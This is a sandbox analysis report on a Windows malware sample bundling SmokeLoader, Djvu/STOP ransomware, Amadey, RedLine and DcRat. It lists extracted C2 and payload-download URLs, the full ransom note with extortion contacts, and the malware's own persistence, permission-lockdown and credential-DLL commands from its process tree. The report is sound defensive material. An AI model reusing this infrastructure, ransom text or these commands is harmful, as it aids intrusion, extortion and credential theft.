amadey | 64ca65d71fa8db3699aab3a274c05c0308777f7d4edbe2a5f6286f81feb85e2d

Analysis

max time kernel
103s
max time network
153s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
27/03/2023, 09:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

64ca65d71fa8db3699aab3a274c05c0308777f7d4edbe2a5f6286f81feb85e2d.exe
Size

258KB
MD5

765a6672caee39b596dc33685bd56f13
SHA1

6f244739ff9e10757632eb6c2ac13b3cfe2f3d9d
SHA256

64ca65d71fa8db3699aab3a274c05c0308777f7d4edbe2a5f6286f81feb85e2d
SHA512

b5182ac8074ab6e94fb82256b6018cf57c527f28e3c9640896417aeef3e6469073e57b7c9cfc0bb4d99281b105e0d9afa25a4df911712f217fa3466e92b4a4a4
SSDEEP

3072:xfDZspiH4TQzXLJixaF+xO8Ay7btd8eW0hvne7hUWWksHM6Mqs5xLzNNPnN:p+wzXLnqODyftd82hPWWkss93

Score

10^/10

amadey dcrat djvu redline smokeloader koreamon pub1 sprg backdoor discovery evasion infostealer persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2022

http://potunulit.org/

http://hutnilior.net/

http://bulimu55t.net/

http://soryytlic4.net/

http://novanosa5org.org/

http://nuljjjnuli.org/

http://tolilolihul.net/

http://somatoka51hub.net/

http://hujukui3.net/

http://bukubuka1.net/

http://golilopaster.org/

http://newzelannd66.org/

http://otriluyttn.org/

http://aapu.at/tmp/

http://poudineh.com/tmp/

http://firsttrusteedrx.ru/tmp/

http://kingpirate.ru/tmp/

http://hoh0aeghwugh2gie.com/

http://hie7doodohpae4na.com/

http://aek0aicifaloh1yo.com/

rc4.i32

Extracted

Family

djvu

http://zexeq.com/lancer/get.php

Attributes

extension
.typo
offline_id
Yao2o6f5vNghOpgVBhEIA8O96SC5vLcgITgaRMt1
payload_url
http://uaery.top/dl/build2.exe

http://zexeq.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-f8UEvx4T0A Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0672IsjO

rsa_pubkey.plain

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Botnet

sprg

Extracted

Family

amadey

Version

3.65

77.73.134.27/8bmdh3Slb2/index.php

Extracted

Family

redline

Botnet

koreamon

koreamonitoring.com:80

Attributes

auth_value
1a0e1a9f491ef3df873a03577dfa10aa

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detected Djvu ransomware 16 IoCs

resource	yara_rule
behavioral1/memory/4764-170-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4536-173-0x0000000004950000-0x0000000004A6B000-memory.dmp	family_djvu
behavioral1/memory/4764-179-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4764-172-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4764-191-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4764-193-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2632-200-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2632-201-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2632-206-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2632-207-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2632-208-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2632-228-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2632-230-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2632-231-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2632-238-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2632-241-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 9 IoCs

resource	yara_rule
behavioral1/memory/3972-312-0x0000000002720000-0x000000000277A000-memory.dmp	family_redline
behavioral1/memory/3972-314-0x00000000027D0000-0x0000000002826000-memory.dmp	family_redline
behavioral1/memory/3972-319-0x00000000027D0000-0x0000000002822000-memory.dmp	family_redline
behavioral1/memory/3972-320-0x00000000027D0000-0x0000000002822000-memory.dmp	family_redline
behavioral1/memory/3972-322-0x00000000027D0000-0x0000000002822000-memory.dmp	family_redline
behavioral1/memory/3972-324-0x00000000027D0000-0x0000000002822000-memory.dmp	family_redline
behavioral1/memory/3972-326-0x00000000027D0000-0x0000000002822000-memory.dmp	family_redline
behavioral1/memory/3972-328-0x00000000027D0000-0x0000000002822000-memory.dmp	family_redline
behavioral1/memory/3972-330-0x00000000027D0000-0x0000000002822000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 512 created 3164	512	XandETC.exe	25
PID 512 created 3164	512	XandETC.exe	25
PID 512 created 3164	512	XandETC.exe	25
PID 512 created 3164	512	XandETC.exe	25
PID 512 created 3164	512	XandETC.exe	25

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Deletes itself 1 IoCs

pid	Process
3164	Explorer.EXE

Executes dropped EXE 21 IoCs

pid	Process
4536	EC2A.exe
4372	F0BF.exe
4764	EC2A.exe
4836	F265.exe
4948	EC2A.exe
2632	EC2A.exe
5060	979.exe
4780	AF1.exe
4192	build3.exe
656	20EB.exe
4772	Player3.exe
3344	ss31.exe
1508	nbveek.exe
512	XandETC.exe
2560	mstsca.exe
1152	2EA7.exe
3744	Player3.exe
3972	7084.exe
2288	9EA9.bat.exe
3216	C0B9.exe
3952	updater.exe

Loads dropped DLL 3 IoCs

pid	Process
5008	rundll32.exe
4848	rundll32.exe
2168	rundll32.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3668	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\953cce22-b8d2-4296-ba73-5ae3b41b6469\\EC2A.exe\" --AutoStart"	EC2A.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	api.2ip.ua
10	api.2ip.ua
25	api.2ip.ua

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4536 set thread context of 4764	4536	EC2A.exe	68
PID 4948 set thread context of 2632	4948	EC2A.exe	75

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2544	sc.exe
1392	sc.exe
492	sc.exe
524	sc.exe
1392	sc.exe
5104	sc.exe
4320	sc.exe
4700	sc.exe
1016	sc.exe
4236	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
3920	4836	WerFault.exe	69
3724	4780	WerFault.exe	77
4956	1152	WerFault.exe	99
5100	2168	WerFault.exe	153

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	64ca65d71fa8db3699aab3a274c05c0308777f7d4edbe2a5f6286f81feb85e2d.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	979.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F0BF.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F0BF.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F0BF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	979.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	979.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	64ca65d71fa8db3699aab3a274c05c0308777f7d4edbe2a5f6286f81feb85e2d.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	64ca65d71fa8db3699aab3a274c05c0308777f7d4edbe2a5f6286f81feb85e2d.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
5020	schtasks.exe
2304	schtasks.exe
2120	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1808	64ca65d71fa8db3699aab3a274c05c0308777f7d4edbe2a5f6286f81feb85e2d.exe
1808	64ca65d71fa8db3699aab3a274c05c0308777f7d4edbe2a5f6286f81feb85e2d.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3164	Explorer.EXE

Suspicious behavior: MapViewOfSection 21 IoCs

pid	Process
1808	64ca65d71fa8db3699aab3a274c05c0308777f7d4edbe2a5f6286f81feb85e2d.exe
4372	F0BF.exe
5060	979.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeDebugPrivilege	3972	7084.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	2288	9EA9.bat.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeIncreaseQuotaPrivilege	1580	powershell.exe
Token: SeSecurityPrivilege	1580	powershell.exe
Token: SeTakeOwnershipPrivilege	1580	powershell.exe
Token: SeLoadDriverPrivilege	1580	powershell.exe
Token: SeSystemProfilePrivilege	1580	powershell.exe
Token: SeSystemtimePrivilege	1580	powershell.exe
Token: SeProfSingleProcessPrivilege	1580	powershell.exe
Token: SeIncBasePriorityPrivilege	1580	powershell.exe
Token: SeCreatePagefilePrivilege	1580	powershell.exe
Token: SeBackupPrivilege	1580	powershell.exe
Token: SeRestorePrivilege	1580	powershell.exe
Token: SeShutdownPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeSystemEnvironmentPrivilege	1580	powershell.exe
Token: SeRemoteShutdownPrivilege	1580	powershell.exe
Token: SeUndockPrivilege	1580	powershell.exe
Token: SeManageVolumePrivilege	1580	powershell.exe
Token: 33	1580	powershell.exe
Token: 34	1580	powershell.exe
Token: 35	1580	powershell.exe
Token: 36	1580	powershell.exe
Token: SeShutdownPrivilege	784	powercfg.exe
Token: SeCreatePagefilePrivilege	784	powercfg.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeShutdownPrivilege	1588	reg.exe
Token: SeCreatePagefilePrivilege	1588	reg.exe
Token: SeShutdownPrivilege	1368	powercfg.exe
Token: SeCreatePagefilePrivilege	1368	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3164 wrote to memory of 4536	3164	Explorer.EXE	66
PID 3164 wrote to memory of 4536	3164	Explorer.EXE	66
PID 3164 wrote to memory of 4536	3164	Explorer.EXE	66
PID 3164 wrote to memory of 4372	3164	Explorer.EXE	67
PID 3164 wrote to memory of 4372	3164	Explorer.EXE	67
PID 3164 wrote to memory of 4372	3164	Explorer.EXE	67
PID 4536 wrote to memory of 4764	4536	EC2A.exe	68
PID 4536 wrote to memory of 4764	4536	EC2A.exe	68
PID 4536 wrote to memory of 4764	4536	EC2A.exe	68
PID 4536 wrote to memory of 4764	4536	EC2A.exe	68
PID 4536 wrote to memory of 4764	4536	EC2A.exe	68
PID 4536 wrote to memory of 4764	4536	EC2A.exe	68
PID 4536 wrote to memory of 4764	4536	EC2A.exe	68
PID 4536 wrote to memory of 4764	4536	EC2A.exe	68
PID 4536 wrote to memory of 4764	4536	EC2A.exe	68
PID 4536 wrote to memory of 4764	4536	EC2A.exe	68
PID 3164 wrote to memory of 4836	3164	Explorer.EXE	69
PID 3164 wrote to memory of 4836	3164	Explorer.EXE	69
PID 3164 wrote to memory of 4836	3164	Explorer.EXE	69
PID 4764 wrote to memory of 3668	4764	EC2A.exe	72
PID 4764 wrote to memory of 3668	4764	EC2A.exe	72
PID 4764 wrote to memory of 3668	4764	EC2A.exe	72
PID 4764 wrote to memory of 4948	4764	EC2A.exe	73
PID 4764 wrote to memory of 4948	4764	EC2A.exe	73
PID 4764 wrote to memory of 4948	4764	EC2A.exe	73
PID 4948 wrote to memory of 2632	4948	EC2A.exe	75
PID 4948 wrote to memory of 2632	4948	EC2A.exe	75
PID 4948 wrote to memory of 2632	4948	EC2A.exe	75
PID 4948 wrote to memory of 2632	4948	EC2A.exe	75
PID 4948 wrote to memory of 2632	4948	EC2A.exe	75
PID 4948 wrote to memory of 2632	4948	EC2A.exe	75
PID 4948 wrote to memory of 2632	4948	EC2A.exe	75
PID 4948 wrote to memory of 2632	4948	EC2A.exe	75
PID 4948 wrote to memory of 2632	4948	EC2A.exe	75
PID 4948 wrote to memory of 2632	4948	EC2A.exe	75
PID 3164 wrote to memory of 5060	3164	Explorer.EXE	76
PID 3164 wrote to memory of 5060	3164	Explorer.EXE	76
PID 3164 wrote to memory of 5060	3164	Explorer.EXE	76
PID 3164 wrote to memory of 4780	3164	Explorer.EXE	77
PID 3164 wrote to memory of 4780	3164	Explorer.EXE	77
PID 3164 wrote to memory of 4780	3164	Explorer.EXE	77
PID 2632 wrote to memory of 4192	2632	EC2A.exe	79
PID 2632 wrote to memory of 4192	2632	EC2A.exe	79
PID 2632 wrote to memory of 4192	2632	EC2A.exe	79
PID 4192 wrote to memory of 5020	4192	build3.exe	80
PID 4192 wrote to memory of 5020	4192	build3.exe	80
PID 4192 wrote to memory of 5020	4192	build3.exe	80
PID 3164 wrote to memory of 656	3164	Explorer.EXE	82
PID 3164 wrote to memory of 656	3164	Explorer.EXE	82
PID 3164 wrote to memory of 656	3164	Explorer.EXE	82
PID 656 wrote to memory of 4772	656	20EB.exe	83
PID 656 wrote to memory of 4772	656	20EB.exe	83
PID 656 wrote to memory of 4772	656	20EB.exe	83
PID 656 wrote to memory of 3344	656	20EB.exe	84
PID 656 wrote to memory of 3344	656	20EB.exe	84
PID 4772 wrote to memory of 1508	4772	Player3.exe	86
PID 4772 wrote to memory of 1508	4772	Player3.exe	86
PID 4772 wrote to memory of 1508	4772	Player3.exe	86
PID 656 wrote to memory of 512	656	20EB.exe	85
PID 656 wrote to memory of 512	656	20EB.exe	85
PID 1508 wrote to memory of 2304	1508	nbveek.exe	87
PID 1508 wrote to memory of 2304	1508	nbveek.exe	87
PID 1508 wrote to memory of 2304	1508	nbveek.exe	87
PID 1508 wrote to memory of 1588	1508	nbveek.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3164
- C:\Users\Admin\AppData\Local\Temp\64ca65d71fa8db3699aab3a274c05c0308777f7d4edbe2a5f6286f81feb85e2d.exe
  "C:\Users\Admin\AppData\Local\Temp\64ca65d71fa8db3699aab3a274c05c0308777f7d4edbe2a5f6286f81feb85e2d.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1808
- C:\Users\Admin\AppData\Local\Temp\EC2A.exe
  C:\Users\Admin\AppData\Local\Temp\EC2A.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4536
- - C:\Users\Admin\AppData\Local\Temp\EC2A.exe
    C:\Users\Admin\AppData\Local\Temp\EC2A.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4764
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\953cce22-b8d2-4296-ba73-5ae3b41b6469" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      PID:3668
  - - C:\Users\Admin\AppData\Local\Temp\EC2A.exe
      "C:\Users\Admin\AppData\Local\Temp\EC2A.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4948
    - - C:\Users\Admin\AppData\Local\Temp\EC2A.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EC2A.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2632
      - C:\Users\Admin\AppData\Local\e2792aaa-c9ce-4cc3-aabe-7ae79af7e3b3\build3.exe
        
        "C:\Users\Admin\AppData\Local\e2792aaa-c9ce-4cc3-aabe-7ae79af7e3b3\build3.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4192
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:5020
- C:\Users\Admin\AppData\Local\Temp\F0BF.exe
  C:\Users\Admin\AppData\Local\Temp\F0BF.exe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4372
- C:\Users\Admin\AppData\Local\Temp\F265.exe
  C:\Users\Admin\AppData\Local\Temp\F265.exe
  2⤵
  - Executes dropped EXE
  PID:4836
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 480
    3⤵
    - Program crash
    PID:3920
- C:\Users\Admin\AppData\Local\Temp\979.exe
  C:\Users\Admin\AppData\Local\Temp\979.exe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5060
- C:\Users\Admin\AppData\Local\Temp\AF1.exe
  C:\Users\Admin\AppData\Local\Temp\AF1.exe
  2⤵
  - Executes dropped EXE
  PID:4780
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 476
    3⤵
    - Program crash
    PID:3724
- C:\Users\Admin\AppData\Local\Temp\20EB.exe
  C:\Users\Admin\AppData\Local\Temp\20EB.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:656
- - C:\Users\Admin\AppData\Local\Temp\Player3.exe
    "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4772
  - - C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
      "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1508
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2304
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
        5⤵
        
        PID:1588
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:1964
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nbveek.exe" /P "Admin:N"
        6⤵
        
        PID:316
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nbveek.exe" /P "Admin:R" /E
        6⤵
        
        PID:208
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:192
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\16de06bfb4" /P "Admin:N"
        6⤵
        
        PID:1148
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\16de06bfb4" /P "Admin:R" /E
        6⤵
        
        PID:2220
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:5008
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
        6⤵
        Loads dropped DLL
        
        PID:2168
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2168 -s 612
        7⤵
        Program crash
        
        PID:5100
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:4848
- - C:\Users\Admin\AppData\Local\Temp\ss31.exe
    "C:\Users\Admin\AppData\Local\Temp\ss31.exe"
    3⤵
    - Executes dropped EXE
    PID:3344
- - C:\Users\Admin\AppData\Local\Temp\XandETC.exe
    "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:512
- C:\Users\Admin\AppData\Local\Temp\2EA7.exe
  C:\Users\Admin\AppData\Local\Temp\2EA7.exe
  2⤵
  - Executes dropped EXE
  PID:1152
- - C:\Users\Admin\AppData\Local\Temp\Player3.exe
    "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
    3⤵
    - Executes dropped EXE
    PID:3744
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1152 -s 1436
    3⤵
    - Program crash
    PID:4956
- C:\Users\Admin\AppData\Local\Temp\7084.exe
  C:\Users\Admin\AppData\Local\Temp\7084.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9EA9.bat" "
  2⤵
  PID:756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w hidden -c #
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1832
- - C:\Users\Admin\AppData\Local\Temp\9EA9.bat.exe
